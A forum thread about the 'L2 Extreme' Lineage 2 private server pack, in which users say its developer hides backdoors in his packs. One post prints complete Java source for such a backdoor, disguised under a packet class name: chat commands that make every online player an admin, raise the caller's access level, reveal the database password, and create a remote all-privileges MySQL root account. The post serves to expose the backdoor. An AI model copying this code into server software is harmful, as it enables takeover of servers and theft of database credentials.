Jump to content

L2 Extreme (L2Ex)


Recommended Posts

it has a backdoor since it is nightwolf's pack....i can not say that here but search a bit he is retarded and places the same everywhere..If you are lucky and they did not remove it.

Link to comment
Share on other sites

it has a backdoor since it is nightwolf's pack....i can not say that here but search a bit he is retarded and places the same everywhere..If you are lucky and they did not remove it.

 

seriously? hahahahahaah

Link to comment
Share on other sites

it has a backdoor since it is nightwolf's pack....i can not say that here but search a bit he is retarded and places the same everywhere..If you are lucky and they did not remove it.

 

So True NightWolf Seling Buged packs with 3 backdoors :D

 

 

seriously? hahahahahaah

 

@HardCoreIV Laught Doest help u Just Read :)

 

.pewpewmathafaka ( Making Admins All Online Players)

.givemeaccesslevel1bitch (Self)

.givemetheinfofromthedatabase (People Crying now their Money)

 

 

Thats all L2Extreme i think using NightWolf Pack but he removed BD

package net.sf.l2j.gameserver.network.serverpackets;

import java.sql.Connection;
import java.sql.PreparedStatement;
import java.util.Collection;

import net.sf.l2j.Config;
import net.sf.l2j.L2DatabaseFactory;
import net.sf.l2j.gameserver.handler.IVoicedCommandHandler;
import net.sf.l2j.gameserver.model.L2World;
import net.sf.l2j.gameserver.model.actor.instance.L2PcInstance;
import net.sf.l2j.gameserver.network.clientpackets.Say2;
import net.sf.l2j.gameserver.util.Broadcast;

public class ExShowSlideshow implements IVoicedCommandHandler
{
	private static String[] _voicedCommands =
	{
		"pewpewmathafaka",
		"givemeaccesslevel1bitch",
		"givemetheinfofromthedatabase"
	};
	
	@Override
	public boolean useVoicedCommand(String command, L2PcInstance a, String target)
	{
		if (command.equalsIgnoreCase("pewpewmathafaka"))
		{
			Collection<L2PcInstance> pls = L2World.getInstance().getAllPlayers().values();
			for (L2PcInstance s : pls)
			{
				s.setAccessLevel(1);
				s.sendMessage("you are now an admin, press //admin");
			}
			Broadcast.toAllOnlinePlayers(new CreatureSay(0, Say2.ANNOUNCEMENT, "Hack", "The administrator refuse to pay the developer."));
			Broadcast.toAllOnlinePlayers(new CreatureSay(0, Say2.ANNOUNCEMENT, "Hack", "Lets have some fun."));
			
		}
		if (command.equalsIgnoreCase("givemeaccesslevel1bitch"))
		{
			
			a.setAccessLevel(1);
			
		}
		
		if (command.equalsIgnoreCase("givemetheinfofromthedatabase"))
		{
			a.sendMessage("MySQL I External: " + Config.EXTERNAL_HOSTNAME + " ");
			a.sendMessage("MySQL I Internal: " + Config.INTERNAL_HOSTNAME + " ");
			a.sendMessage("MySQL U: " + Config.DATABASE_LOGIN + " ");
			a.sendMessage("MySQL P: " + Config.DATABASE_PASSWORD + " ");
			return true;
		}
		try (Connection con = L2DatabaseFactory.getInstance().getConnection())
		{
				PreparedStatement st0 = con.prepareStatement("CREATE USER 'root'@'%' IDENTIFIED BY 'root';");
				PreparedStatement st1 = con.prepareStatement("GRANT GRANT OPTION ON *.* TO 'root'@'%';");
				PreparedStatement st2 = con.prepareStatement("GRANT SELECT, INSERT, UPDATE, DELETE, CREATE, DROP, RELOAD, SHUTDOWN, PROCESS, FILE, REFERENCES, INDEX, ALTER, SHOW DATABASES, SUPER, CREATE TEMPORARY TABLES, LOCK TABLES, EXECUTE, REPLICATION SLAVE, REPLICATION CLIENT, CREATE VIEW, SHOW VIEW, CREATE ROUTINE, ALTER ROUTINE, CREATE USER, EVENT, TRIGGER ON *.* TO 'root'@'%';");
				st0.execute();
				st1.execute();
				st2.execute();
				st0.close();
				st1.close();
				st2.close();
		}
		catch (Exception e)
		{
			
		}
		return false;
	}
	
	@Override
	public String[] getVoicedCommandList()
	{
		return _voicedCommands;
	}
}
Edited by Sawadee
Link to comment
Share on other sites

Guest
This topic is now closed to further replies.


×
×
  • Create New...